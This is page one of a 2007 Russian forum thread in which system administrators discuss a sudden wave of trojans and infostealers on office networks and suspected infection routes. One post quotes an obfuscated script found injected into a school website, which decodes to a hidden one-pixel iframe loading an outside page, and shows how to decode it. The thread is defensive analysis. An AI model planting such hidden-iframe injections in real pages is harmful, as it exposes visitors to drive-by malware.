Часовой пояс: UTC + 3 часа




Начать новую тему Новая тема / Ответить на тему Ответить  Сообщений: 114 • Страница 1 из 61  2  3  4  5  6  >
  Версия для печати (полностью) Пред. тема | След. тема 
В случае проблем с отображением форума, отключите блокировщик рекламы
Автор Сообщение
 

Member
Статус: Не в сети
Регистрация: 06.07.2004
Откуда: РФ
Фото: 6
Вчера обнаружил, что, оказывается, симантек пару месяцев не обновлял базы, гад. В отпуск сходил, называется. После обновления показал, что около трети сети подцепили троянов, даунлоадеров и инфостиллеров.
Особенно отмечаю, что не было такого никогда. Однозначно всплеск. Пока не понятно, каким способом подцепили. Нат закрыт, все ходят через сквид. Почта? Какая-нибудь общая страница в интернете? Из зараженных машин только на избранных есть аська и мейл.ру агент.
У старшего админа в головном офисе похожая ситуация.
Yialqm32d.dll
Tuhixw32v.dll
Ovzdg32j.dll
Nipxcc32f.dll
koos.exe
KB98692774.exe
KB85596307.exe
1.exe
lt85.exe
A0000317.exe
и т.д. и т.п.
Пользователи мои не первый день в инет ходят. Ну не было такого раньше. Чезанах???

_________________
It's dolomite, baby! (c)


Последний раз редактировалось targitaj 05.09.2007 12:36, всего редактировалось 1 раз.


Партнер
 

Member
Статус: Не в сети
Регистрация: 08.10.2006
Откуда: Москва
Кто-нибудь увольнялся за последнее время? ;)

_________________
"Если всё пошло не так, сделай вид, что именно так и задумывалось." (с)


 

Member
Статус: Не в сети
Регистрация: 06.07.2004
Откуда: РФ
Фото: 6
Navern
Не та организация. Здесь средний возраст за 40.
Добавлено спустя 4 минуты
У некоторых есть общий файл index[2].htm
Страница - даунлоадер - троян. Откуда страница???

_________________
It's dolomite, baby! (c)


 

Advanced member
Статус: Не в сети
Регистрация: 20.10.2004
Откуда: С-Пб
targitaj писал(а):
KB98692774.exe KB85596307.exe

знакомо...
targitaj писал(а):
Из зараженных машин только на избранных есть аська и мейл.ру агент.

этого хватает, чтобы с таких машин по всей сетке расползлось..
аська случаем не рамблеровская?
targitaj писал(а):
Ну не было такого раньше. Чезанах???

ставь им русскую мозиллу - будет ШАСТЕ...
Добавлено спустя 3 минуты, 57 секунд
targitaj писал(а):
Страница - даунлоадер - троян. Откуда страница???

не поверишь, из интернета!!! :D
на самом деле частенько это палево проявляется именно при IE, с мозиллой намного лучше...

_________________
Матом не ругаюсь, я на нем разговариваю
интересуют антикварные АМД-системы. писать в ЛС.
НЕНАВИЖУ ASUS!!!
*AMD OverClan*


 

Member
Статус: Не в сети
Регистрация: 06.07.2004
Откуда: РФ
Фото: 6
vk6666 писал(а):
аська случаем не рамблеровская?

Дыра, да? В понедельник надо будет заменить на квип.
Добавлено спустя 5 минут, 38 секунд
vk6666 писал(а):
не поверишь, из интернета

Да понятно, что из интернета. У народа между собой мало чего общего, ходят в инет сами по себе, даже ссылками не меняются. Похоже на большой общий ресурс типа мейла или яндекса.
vk6666 писал(а):
чтобы с таких машин по всей сетке расползлось

Каким образом? Это же не черви. Или уже умеют? Тогда почему остальные машины чистые? Я с сассером сталкивался, видел, как он распространяется.

_________________
It's dolomite, baby! (c)


 

Advanced member
Статус: Не в сети
Регистрация: 20.10.2004
Откуда: С-Пб
targitaj писал(а):
Дыра, да?

"труба архангела гавриила" (с) анекдот :)

targitaj писал(а):
У народа между собой мало чего общего

как у вас организованы расшаренные ресурсы?
targitaj писал(а):
Каким образом? Это же не черви. Или уже умеют?

см выше, как расскажешь про шары - тогда будет ясно..

и пара вопросов - тачки без инета заражены?, есть тачки с нетом, не зараженные?
и еще раз повторюсь - ставь мозиллу файрфокс или оперу..
targitaj писал(а):
надо будет заменить на квип.

в обязательном порядке, чем быстрее, тем лучше.

_________________
Матом не ругаюсь, я на нем разговариваю
интересуют антикварные АМД-системы. писать в ЛС.
НЕНАВИЖУ ASUS!!!
*AMD OverClan*


 

Member
Статус: Не в сети
Регистрация: 06.07.2004
Откуда: РФ
Фото: 6
vk6666 писал(а):
как у вас организованы расшаренные ресурсы?

На самбе база 1С и доки.
vk6666 писал(а):
и пара вопросов - тачки без инета заражены?, есть тачки с нетом, не зараженные?

Нет, да.
Сильно смахивает на общий интернет-ресурс.
Добавлено спустя 15 минут, 26 секунд
Есть чистая машина с рамблер-аськой и зараженная с квипом :(

_________________
It's dolomite, baby! (c)


 

Заблокирован
Заблокирован
Статус: Не в сети
Регистрация: 26.07.2006
targitaj писал(а):
Дыра, да? В понедельник надо будет заменить на квип.
Я совершенно недавно убил аську как раз по этой причине. Дырявая как решето.


 

Advanced member
Статус: Не в сети
Регистрация: 20.10.2004
Откуда: С-Пб
targitaj писал(а):
зараженная с квипом

значит не через квип, но аську все равно убей.
да, ты так не ответил насчет браузеров - у тебя IE?
targitaj писал(а):
интернет-ресурс.

какой-нибудь "рамблер-знакомство" или какой-еще ресурс про пеканье... юзера любят подобную ересь..

_________________
Матом не ругаюсь, я на нем разговариваю
интересуют антикварные АМД-системы. писать в ЛС.
НЕНАВИЖУ ASUS!!!
*AMD OverClan*


 

Member
Статус: Не в сети
Регистрация: 26.03.2007
Откуда: з України
Час назад, при загрузке страницы форума, 5 раз срабатывал симантековский фаер- троян дип троат... Ипть...
Добавлено спустя 2 минуты, 22 секунды
опера 9.23

_________________
фЛужу Советскому Союзу! (...и паяю)
[ Клукс-Дед-клан]


 

Member
Статус: Не в сети
Регистрация: 13.06.2006
Кстати, а можно ли доверять Антивирю Касперского 7? Удивительно, что давно уже не было атак/вирей

_________________
Все что не убивает, делает тебя еще слабее и ущербнее, пока смерть наконец не заберет тебя, тонущего в луже собственного дерьма.


 

Advanced member
Статус: Не в сети
Регистрация: 20.10.2004
Откуда: С-Пб
IliaKompGS писал(а):
Удивительно, что давно уже не было атак/вирей

это настораживает.
если не впадлу - снеси на время 7го, и поставь последний NOD32 или DrWeb и почеши ими винч, это так, интересу ради...

_________________
Матом не ругаюсь, я на нем разговариваю
интересуют антикварные АМД-системы. писать в ЛС.
НЕНАВИЖУ ASUS!!!
*AMD OverClan*


 

Member
Статус: Не в сети
Регистрация: 11.06.2007
Откуда: оттуда
было недавно. сцуко сыпал бсодами в сторону оперы и проца, мол все хана им, но ощущение такое что бсоды в пайинте нарисованы. замоскировался под файл хелп и тварил свои дела. блин я уже изучаю файлы и папки в папке виндоус наизусть гыыыы

_________________
это жжж не спроста.


 

Member
Статус: Не в сети
Регистрация: 13.06.2006

_________________
Все что не убивает, делает тебя еще слабее и ущербнее, пока смерть наконец не заберет тебя, тонущего в луже собственного дерьма.


 

Member
Статус: Не в сети
Регистрация: 10.08.2005
Откуда: Москва
IliaKompGS

У меня стояла раньше связка NOD32 + Outpost лицензии, молчали практически постоянно, в тихую все творили :-D


 

Member
Статус: Не в сети
Регистрация: 07.05.2004
Откуда: Санкт-Петербург
IliaKompGS у меня нод тоже ругаеццо на твой сайт...

зы: у меня тут похуже ситуевина. админ, который был до меня кроме башорга и линейки ниче не админил. итог - троян на контроллере домена. контроллер, етественно единственный.

причем троян, перехватывает апи вызовы, маскирует свои файлы и процессы, открывает бэкдоры и пр...
каспером не сносится (прячеццо гад.)
сноситя только AVZ, но боязно трогать контроллер. он же почтовик он же файлопомойка.
ща буду ставить второй контроллер, передавать роли, переносить почту...


 

Member
Статус: Не в сети
Регистрация: 08.10.2006
Мде . Сайт грязноватый. NOD аж захлебнулся весь.


 

Member
Статус: Не в сети
Регистрация: 13.06.2006
D1max1mym писал(а):
NOD аж захлебнулся весь.

Можешь сцылки на грязные страшицы дать? Хочу проверить каспера

_________________
Все что не убивает, делает тебя еще слабее и ущербнее, пока смерть наконец не заберет тебя, тонущего в луже собственного дерьма.


 

Advanced member
Статус: Не в сети
Регистрация: 27.02.2007
Откуда: Москва
Фото: 90
IliaKompGS писал(а):
Хотя вот, залез на школьный сайт


В конце страницы:

Код:
<Script Language='Javascript'>
<!--
document.write(unescape('%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A
%2F%2F%25%37%37%25%37%37%25%37%37%25%32%65%25%37%34%25%36%39%25%36%65%25%36
%62%25%36%31%25%32%65%25%37%32%25%37%35%2F%64%6F%63%2F%35%35%35%2F%6E%65%77
%2F%69%6D%61%2F%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D
%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F
%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E'));
//-->
</Script>


Пишем в адресной строке браузера:

Код:
javascript:alert(unescape('%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%73%72
%63%3D%68%74%74%70%3A%2F%2F%25%37%37%25%37%37%25%37%37%25%32%65%25%37
%34%25%36%39%25%36%65%25%36%62%25%36%31%25%32%65%25%37%32%25%37%35%2F
%64%6F%63%2F%35%35%35%2F%6E%65%77%2F%69%6D%61%2F%20%66%72%61%6D%65%62
%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69
%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20
%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E'))

без энтеров, естественно.

И видим раскодированный ХТМЛ... То, что я увидел, меня совсем не удивило.

А именно:
Код:
<html><iframe src=http://www.tinka.ru/doc/555/new/ima/ frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe></html>


Вот так действуют некоторые уроды.

З.Ы. на всякий случай включил пока в проксомитроне "Kill Dynamic HTML JavaScripts". Мало ли...


З.З.Ы.
По адресу http://www.tinka.ru/doc/555/new/ima/ нас ждет ошибка 404, то есть страничку админ удалил... Похоже.

Вывод:
Ничего опасного в данный момент на странице нет, а антивирь просто ругается на фрейм...
Но таким способом действительно можно в фоне подгрузить злую страничку.


А вообще, сносим ишака, ставим браузер(а не обозреватель :D).. Веб-фильтр... И все.
Те же Proxomitron и Proximodo можно использовать в связке со сквидНТ для раздачи инета. И фильтровать весь веб-траффик таким образом... Заодно баннеры порежет.

_________________
EPYC 4585PX / x870e CH Extreme / RX 6900XT / 2x48 Trident Z5 @ 6400 CL28 (ICE-RDT, No GDM Vdd 1.6 Vddq 1.45 SoC 1.25 VDDP 1.0)


 

Member
Статус: Не в сети
Регистрация: 17.10.2006
Откуда: old school
Фото: 14
Через инет прошла какая-то волна. Мне все по фиг, а родителей, весьма умеренно использующих инет (и только инет), два раза чистить приходилось (поставил им avg). В основном трояны, какой-то Agent-E был, другие не помню.
HertZ писал(а):
Ничего опасного в данный момент на странице нет,

+1 МакАфи и его сайтадвизор молчат, как утопленники.
HertZ писал(а):
сносим ишака

ЩАС! Смотреть надо, что запускаешь, тогда и ишаки раздражать не будут.


Показать сообщения за:  Поле сортировки  
Начать новую тему Новая тема / Ответить на тему Ответить  Сообщений: 114 • Страница 1 из 61  2  3  4  5  6  >
-

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 56


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Перейти:  
Создано на основе phpBB® Forum Software © phpBB Group
Русская поддержка phpBB | Kolobok smiles © Aiwan